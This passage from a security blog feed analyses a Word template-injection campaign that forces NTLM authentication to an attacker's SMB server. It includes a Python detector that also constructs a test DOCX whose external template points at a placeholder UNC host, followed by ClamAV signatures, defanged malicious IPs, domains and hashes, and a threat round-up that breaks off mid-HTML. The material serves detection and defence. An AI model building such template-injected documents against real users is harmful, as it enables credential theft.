Instead of code, we found an instance of template injection:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-MNDGZHHcFMg/WV_nxX6Z6iI/AAAAAAAAAN8/RVNxKd32XPA-5RFPpY52JAbhZX1BWd0ngCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="284" data-original-width="1600" height="112" src="https://3.bp.blogspot.com/-MNDGZHHcFMg/WV_nxX6Z6iI/AAAAAAAAAN8/RVNxKd32XPA-5RFPpY52JAbhZX1BWd0ngCLcBGAs/s640/image7.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Instance of template injection found in the document&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Our initial intelligence concerning the attack suggested that a malicious SMB server was being used to silently harvest user credentials. The sample confirms this: the injected template points at an external server, and Word fetches it over SMB, so the host authenticates to the attacker's server without any prompt to the user. Still, this did not explain why the same sample had attempted a session over TCP 80. After further research, we determined that the sandbox VM's network provider order favoured WebDAV over SMB for this kind of UNC request. In short, because of that host-level preference, the sandbox requested the template over WebDAV (TCP 80) rather than over an SMB session (TCP 445). 
This was confirmed with another related sample whose external server was still listening on TCP 80 but no longer serving the template.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-V7ne8pl6dcc/WV_n28iiIfI/AAAAAAAAAOA/kYTidFAKYhIHkE3JRrP4Cb90ZgDeC-OtQCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1403" data-original-width="1600" height="560" src="https://3.bp.blogspot.com/-V7ne8pl6dcc/WV_n28iiIfI/AAAAAAAAAOA/kYTidFAKYhIHkE3JRrP4Cb90ZgDeC-OtQCLcBGAs/s640/image1.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Sandbox PCAP of the sample&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;The only remaining lead in the template settings was the Relationship ID recorded in word/_rels/settings.xml.rels within the sample: rId1337. 
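&lt;br /&gt;&lt;br /&gt;To make that inspection repeatable, the following Python script is an added example; it is not code from this post, from the samples, or from any tool the post names. It builds a minimal DOCX in memory with the same structure the samples used: a w:attachedTemplate element in word/settings.xml whose r:id resolves, through word/_rels/settings.xml.rels, to a Relationship of type attachedTemplate with TargetMode="External". It then reads the package back, reports every external template relationship with its Relationship ID and target, and notes which transport Word would use for that target. The 203.0.113.10 address, the template.dotx name and the packaged files are constructed placeholders; the note that a UNC target goes out over SMB (TCP 445) or WebDAV (TCP 80) depending on the host's network provider order restates the behaviour described above and is not something the script measures. To check a real file, call find_remote_templates(open(path, "rb").read()).&lt;br /&gt;&lt;br /&gt;

```python
"""Added example: find remote (injected) template references in a DOCX package.

A DOCX is a zip. Word resolves w:attachedTemplate in word/settings.xml through
word/_rels/settings.xml.rels; a Relationship with TargetMode="External" whose
Target is a UNC path or URL makes Word fetch the template from that host on open.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
NS_W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
REL_TEMPLATE = NS_R + "/attachedTemplate"
ET.register_namespace("w", NS_W)
ET.register_namespace("r", NS_R)


def classify_target(target):
    """Describe the transport Word is expected to use for an external template target.

    Assumption (restating the behaviour described in the post): a UNC path is fetched
    over SMB (TCP 445) or WebDAV (TCP 80) according to the host's network provider order.
    """
    t = target.lower()
    if t.startswith("\\\\") or t.startswith("//"):
        return "UNC path: SMB (TCP 445) or WebDAV (TCP 80), by provider order"
    if t.startswith("http://") or t.startswith("https://"):
        return "URL: WebDAV over HTTP(S)"
    return "other"


def find_remote_templates(docx_bytes):
    """Return [(rId, target, note)] for every external attachedTemplate relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        if "word/_rels/settings.xml.rels" not in names:
            return findings
        rels = ET.fromstring(z.read("word/_rels/settings.xml.rels"))
        # The rId that word/settings.xml actually points at, if any.
        referenced = None
        if "word/settings.xml" in names:
            settings = ET.fromstring(z.read("word/settings.xml"))
            node = settings.find("{%s}attachedTemplate" % NS_W)
            if node is not None:
                referenced = node.get("{%s}id" % NS_R)
        for rel in rels.findall("{%s}Relationship" % NS_REL):
            if rel.get("Type") != REL_TEMPLATE:
                continue
            if rel.get("TargetMode") != "External":
                continue  # a local .dotm path is normal for Word templates
            rid = rel.get("Id")
            target = rel.get("Target", "")
            note = classify_target(target)
            if rid != referenced:
                note += " (dangling: not referenced by settings.xml)"
            findings.append((rid, target, note))
    return findings


def build_sample_docx(target=None, rid="rId1337"):
    """Build a minimal, constructed DOCX (not a real sample) for testing.

    With target=None the package carries no template relationship at all.
    """
    rels = ET.Element("Relationships", xmlns=NS_REL)
    settings = ET.Element("{%s}settings" % NS_W)
    if target is not None:
        ET.SubElement(rels, "Relationship", Id=rid, Type=REL_TEMPLATE,
                      Target=target, TargetMode="External")
        ET.SubElement(settings, "{%s}attachedTemplate" % NS_W,
                      {"{%s}id" % NS_R: rid})
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/settings.xml.rels", ET.tostring(rels, encoding="unicode"))
        z.writestr("word/settings.xml", ET.tostring(settings, encoding="unicode"))
    return buf.getvalue()


if __name__ == "__main__":
    # 203.0.113.10 is a documentation address used here as a placeholder.
    for hit in find_remote_templates(build_sample_docx("\\\\203.0.113.10\\template.dotx")):
        print("%s pulls %s  [%s]" % hit)
```

A relationship of this type with TargetMode="External" is the whole indicator; the rId value is only useful for tying a sample to tooling, as the rId1337 match did here, so the script reports it rather than keying on it.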
Researching this Relationship ID led us to the GitHub page of a phishing tool named &lt;a href="https://github.com/ryhanson/phishery"&gt;Phishery&lt;/a&gt; which happened to use the exact same ID in its template injection:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-ZOFmAV42hvE/WV_n-MsM7hI/AAAAAAAAAOE/DZ28t2qo-w4oLmDr6WZZiyTCGGKuanPBQCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="648" data-original-width="992" height="418" src="https://2.bp.blogspot.com/-ZOFmAV42hvE/WV_n-MsM7hI/AAAAAAAAAOE/DZ28t2qo-w4oLmDr6WZZiyTCGGKuanPBQCLcBGAs/s640/image2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;GitHub page of the Phishery tool&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;Surprisingly, the same ID is found at the bottom of the aforementioned Go source:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-5XRY9WwnHBU/WV_oD4PBRBI/AAAAAAAAAOI/GPtFmRchtDU8SdwCtoPCm_HoYFENcFIIACLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="255" data-original-width="1001" height="161" src="https://3.bp.blogspot.com/-5XRY9WwnHBU/WV_oD4PBRBI/AAAAAAAAAOI/GPtFmRchtDU8SdwCtoPCm_HoYFENcFIIACLcBGAs/s640/image3.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;"rId1337" found in the Phishery tool, line 
105.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Phishery, however, does NOT rely on a malicious SMB server. Rather, the connection is handled over HTTPS, and user credentials are harvested through an HTTP Basic Authentication prompt. No such prompt was needed, or seen, for samples requesting the template over SMB. The fact that both this tool and the reported attack rely on template injection with the exact same Relationship ID suggests one of the following:&lt;br /&gt;&lt;br /&gt;1. Mere coincidence (always a possibility);&lt;br /&gt;2. The attackers took notice of this tool and either modified it or developed their attack from scratch while sticking to the same concept used by the tool; or&lt;br /&gt;3. The attackers used the same Relationship ID to thwart analysis of the attack itself (remember: our first inclination was to follow up on the failed connection attempts over TCP 80).&lt;br /&gt;&lt;br /&gt;At this time, there is no evidence to confirm any of the three possibilities. However, the attackers' reliance on a successful SMB session stemming from outbound traffic over TCP 445 further confirms that organizations are still failing to properly block such egress traffic to public hosts. With no credential prompt needed for the SMB variation, the simplicity and effectiveness of the technique is clear. If an attacker is able to compromise a host and run such a server internally, the situation becomes significantly more grave.&lt;br /&gt;&lt;br /&gt;Furthermore, since the attacker-controlled SMB server was down when we analyzed these samples, it is not possible to determine the ultimate payloads (if any) that could have been dropped by the downloaded template. As we have seen with recent attacks, the intent of an attack is not always obvious. Coercing a Windows host into authenticating to an external SMB server, which exposes the user's NTLM authentication material to that server, has been a known weakness for many years. 
Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;br /&gt;Talos responded to these attacks by reaching out to known affected customers and ensuring that they were aware of and capable of responding to the threat. The attack also illustrates the importance of controlling your network traffic and not allowing outbound protocols such as SMB except where specifically required for your environment. Additionally, a number of ClamAV signatures and email rules were written to ensure that threats leveraging this Office template injection technique are blocked in the future.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Coverage&lt;/h2&gt;&lt;br /&gt;ClamAV signatures created to identify this attack:&lt;br /&gt;&lt;br /&gt;Doc.Tool.Phishery-6331699-0&lt;br /&gt;Doc.Downloader.TemplateInjection-6332119-0&lt;br /&gt;Doc.Downloader.TemplateInjection-6332123-0&lt;br /&gt;&lt;br /&gt;Additional ways our customers can detect and block this threat are listed below.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-opOM7Rp6Y9g/WV_oKXSoC0I/AAAAAAAAAOM/ZGFJdzGqCXItlK4Y24IarhhA34WIRWCiwCLcBGAs/s1600/image11.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="268" data-original-width="320" src="https://2.bp.blogspot.com/-opOM7Rp6Y9g/WV_oKXSoC0I/AAAAAAAAAOM/ZGFJdzGqCXItlK4Y24IarhhA34WIRWCiwCLcBGAs/s1600/image11.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Advanced Malware Protection (&lt;a href="https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html"&gt;AMP&lt;/a&gt;) blocks the malicious Word documents used by these threat actors.&lt;br /&gt;&lt;br /&gt;&lt;a 
href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html"&gt;CWS&lt;/a&gt;, &lt;a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"&gt;WSA&lt;/a&gt;, and &lt;a href="https://umbrella.cisco.com/"&gt;Umbrella&lt;/a&gt; can help identify outbound connections used by these threat actors.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html"&gt;Email Security&lt;/a&gt; can block malicious emails sent by threat actors as part of their campaign.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;AMP Threat Grid&lt;/a&gt; helps identify malicious binaries and builds protection into all Cisco Security products.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;IOCs&lt;/h2&gt;&lt;br /&gt;Due to the nature in which we obtained intelligence related to these attacks, we are unable to share all of the IOCs related to this event; however, we wanted to share as much as possible in the spirit of transparency and collaboration.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Malicious Documents&lt;/b&gt;&lt;br /&gt;Filename:        Report03-23-2017.docx&lt;br /&gt;SHA256:         93cd6696e150caf6106e6066b58107372dcf43377bf4420c848007c10ff80bc9&lt;br /&gt;&lt;br /&gt;Filename:        Controls Engineer.docx&lt;br /&gt;SHA256:         (1) b02508baf8567e62f3c0fd14833c82fb24e8ba4f0dc84aeb7690d9ea83385baa&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (2) 3d6eadf0f0b3fb7f996e6eb3d540945c2d736822df1a37dcd0e25371fa2d75a0&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (3) 
ac6c1df3895af63b864bb33bf30cb31059e247443ddb8f23517849362ec94f08&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Related IP Addresses&lt;/b&gt;&lt;br /&gt;184[.]154[.]150[.]66&lt;br /&gt;5[.]153[.]58[.]45&lt;br /&gt;62[.]8[.]193[.]206&lt;br /&gt;
</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-07T17:06:04.098-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-M7_TVig0AcU/WV_2Dubji2I/AAAAAAAAAOU/PjPQDCPcQ48pZhZcBc84OYwn02UQTEcNgCEwYBhgL/s72-c/talos-social.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/template-injection.html</feedburner:origLink></item><item><title>Threat Round-up for June 30 - July 07</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/AyMUnI59ekI/threat-roundup-0630-0707.html</link><category>Coverage</category><category>Malware</category><category>Threat Round-up</category><author>noreply@blogger.com (Edmund Brumaghin)</author><pubDate>Fri, 07 Jul 2017 09:30:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-5076518895276507582</guid><description>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 30 and July 07. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.&lt;br /&gt;&lt;br /&gt;As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. 
For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.&lt;br /&gt;&lt;br /&gt;This week's most prevalent threats are:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Doc.Downloader.Generic-6332126-0&lt;/b&gt;&lt;br /&gt;Downloader&lt;br /&gt;This breed of document downloaders was discovered after following a lead on a Zbot downloader. They rely on slight obfuscations of the OOXML format that still allow successful loading in Microsoft Word, yet prevent successful runs in select sandbox environments. They also depend on highly obfuscated JS code within a CDF binary contained within the sample itself. Most of the samples rely on repeated use of hex string concatenation, further hindering static analysis of the code.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Doc.Dropper.Agent-6332127-0&lt;/b&gt;&lt;br /&gt;Office Macro Downloader&lt;br /&gt;This is an obfuscated Office macro downloader that leverages PowerShell to download a malicious executable payload. The host that these samples attempt to download the next stage from currently does not resolve.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Doc.Macro.Obfuscation-6331107-0&lt;/b&gt;&lt;br /&gt;Office Macro&lt;br /&gt;Malware authors will attempt to obfuscate the macro code saved inside Office documents to prevent detection or to hide the intent of the code at first glance. This signature detects a recent, widely used technique that hides code behind many arithmetic operations.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Phishing.NikoLata-6332081-0&lt;/b&gt;&lt;br /&gt;Web scam phishing&lt;br /&gt;The NikoLata application repeatedly opens browser windows to the maliciously controlled redirect http://bigpicturepop[.]com/redirect/57a764d042bf8 on the benign site bigpicturepop[.]com. 
These redirects have been seen resolving to pornographic sites, multiple tech scammer sites, and others.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Ransomware.Nyetya-6331387-0&lt;/b&gt;&lt;br /&gt;Ransomware&lt;br /&gt;Nyetya is wormable destructive malware that spreads via PsExec, WMI, and the SMB exploits EternalBlue and EternalRomance. Read more about it on our blog at http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html and http://blog.talosintelligence.com/2017/07/the-medoc-connection.html.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Fileinfector-67&lt;/b&gt;&lt;br /&gt;Worm&lt;br /&gt;Win.Trojan.Fileinfector-67 is a file infector that spreads itself by injecting its code into any kind of file in the filesystem.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Fynloski-6332091-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;Fynloski is a trojan which can be used to deliver other malware to infected computers. These samples are self-extracting CAB archives, and the dropped binaries are further obfuscated. The actual code is unpacked on the stack with mov instructions.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Siggen-6261194-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;This is .NET malware with anti-VM tricks. 
It injects itself in another process and tries to contact CnC servers if the victim computer has network connectivity and it is not an instrumented environment.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;hr /&gt;&lt;h2&gt;Threats&lt;/h2&gt;&lt;h3&gt;Doc.Downloader.Generic-6332126-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Local\10MU_ACBPIDS_S-1-5-5-0-61147&lt;/li&gt;&lt;li&gt;Local\10MU_ACBPIDS_S-1-5-5-0-58021&lt;/li&gt;&lt;li&gt;\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59580&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;119[.]28[.]71[.]78&lt;/li&gt;&lt;li&gt;109[.]86[.]76[.]58&lt;/li&gt;&lt;li&gt;37[.]115[.]165[.]159&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;hoefnen[.]xyz&lt;/li&gt;&lt;li&gt;berasadot[.]top&lt;/li&gt;&lt;li&gt;bagrati[.]top&lt;/li&gt;&lt;li&gt;page[.]numberx[.]org&lt;/li&gt;&lt;li&gt;au[.]forestllc[.]org&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%TEMP%\iio322171.uu&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\lsmkk2[1].exe&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Office\Recent\account_3166.LNK&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Office\Recent\statement_d0bwfa.LNK&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Templates\~$Normal.dotm&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90&lt;/li&gt;&lt;li&gt;ed62f5e6c396940a455a82a7a1864ac696fb00e576631b3293ec53bb4292700d&lt;/li&gt;&lt;li&gt;5788dbf3fef2fbf8f4dbe3edfe8ddc955c9741f6d7287f5d7427d0df53275108&lt;/li&gt;&lt;li&gt;e2c4800a2a925ef71fe173269fe237bd2a43706e897c2de59f96ad5064a2389e&lt;/li&gt;&lt;li&gt;bf544987ac6ee03cb089d54fac8c885bb4c02ef709576f46890d51335a15bef1&lt;/li&gt;&lt;li&gt;542abc75b0bba97deafa82b3424afb98beee71d71599345e659038a7dc969219&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-Eas_0o48AY8/WOf0Ghq59bI/AAAAAAAAAyo/KBeOsopaYkUQ67bPqp3x5EUBpiJaGjx6gCLcB/s400/no-netsec-proxy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://1.bp.blogspot.com/-Eas_0o48AY8/WOf0Ghq59bI/AAAAAAAAAyo/KBeOsopaYkUQ67bPqp3x5EUBpiJaGjx6gCLcB/s400/no-netsec-proxy.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-X7uEBBqF7lI/WV-mLtqsOQI/AAAAAAAAASY/DwkaazW4-EMeeym-kX1Ty3gMLL3RMSIWACLcBGAs/s1600/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://2.bp.blogspot.com/-X7uEBBqF7lI/WV-mLtqsOQI/AAAAAAAAASY/DwkaazW4-EMeeym-kX1Ty3gMLL3RMSIWACLcBGAs/s320/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" 
style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-p9A0RMbv2MI/WV-mSah165I/AAAAAAAAASc/LB8h0XHJYJw8IVArgF_dEVW-Q-itUYpDQCLcBGAs/s1600/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="219" data-original-width="1250" height="112" src="https://3.bp.blogspot.com/-p9A0RMbv2MI/WV-mSah165I/AAAAAAAAASc/LB8h0XHJYJw8IVArgF_dEVW-Q-itUYpDQCLcBGAs/s640/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_threatgrid.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-zTEC_QTgtqg/WV-mbZcXoAI/AAAAAAAAASg/407_gwgvUBoh6XjZBnz8QmtJo_yaq1XqACLcBGAs/s1600/hoefnen.xyz_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="414" data-original-width="1112" height="238" src="https://3.bp.blogspot.com/-zTEC_QTgtqg/WV-mbZcXoAI/AAAAAAAAASg/407_gwgvUBoh6XjZBnz8QmtJo_yaq1XqACLcBGAs/s640/hoefnen.xyz_umbrella.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-jcVgo9rzvA4/WV-mincsktI/AAAAAAAAASk/qbYMd9iO5hcm-zgguqxz5VTGRU2KfRG9ACLcBGAs/s1600/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1600" data-original-width="900" 
src="https://4.bp.blogspot.com/-jcVgo9rzvA4/WV-mincsktI/AAAAAAAAASk/qbYMd9iO5hcm-zgguqxz5VTGRU2KfRG9ACLcBGAs/s1600/a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90_malware.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Doc.Dropper.Agent-6332127-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;77[.]123[.]218[.]185&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;aninasmeesmase[.]com&lt;/li&gt;&lt;li&gt;iitttyense[.]com&lt;/li&gt;&lt;li&gt;monenanshca[.]com&lt;/li&gt;&lt;li&gt;onasnenekaskeeee[.]com&lt;/li&gt;&lt;li&gt;iianem[.]com&lt;/li&gt;&lt;li&gt;mmmzmzlll[.]com&lt;/li&gt;&lt;li&gt;oppasnndnew[.]com&lt;/li&gt;&lt;li&gt;tranasportnmme[.]com&lt;/li&gt;&lt;li&gt;uuunasn[.]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\TEMP\request.doc&lt;/li&gt;&lt;li&gt;\TEMP\~$equest.doc&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Recent\request.lnk&lt;/li&gt;&lt;li&gt;%AppData%\alnyliz.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;17d6dc47409d9a49ff9e0af92088213e1fe7d8cac1f69d73892d229b76395c43&lt;/li&gt;&lt;li&gt;4daaadac1d8dfa337f8e13cff2e3af24cbe6aa97877f3cec1e140507e9f20f19&lt;/li&gt;&lt;li&gt;53e6613c677e5498367a85b43569c81fd4d6d8c211ace257749a7c4f49bdf632&lt;/li&gt;&lt;li&gt;8f6515daea52d6b0e02b113f0357801d55f7d74dc113ab76055ad835ede11002&lt;/li&gt;&lt;li&gt;943ea63228ffb638ad4179ea79531d282ecf01e4d58764eb7bb0c3329a82b1ea&lt;/li&gt;&lt;li&gt;97597a498ab5b13b1fe3cb52e41eee108d91364b31895f896c884c36e28e0d59&lt;/li&gt;&lt;li&gt;a0ccac6ea86fcdbae485abbf7f4374591ae4617cc78b09cb2e13657ad45a9b7e&lt;/li&gt;&lt;li&gt;dad0a717b8fe07b9fc60d7a31deff159814c1c33702256a23e882bac0b50e94a&lt;/li&gt;&lt;li&gt;df159704ed213a2f6ebf4087006acd2502aecc586b6828ae5222688cf9c20745&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" 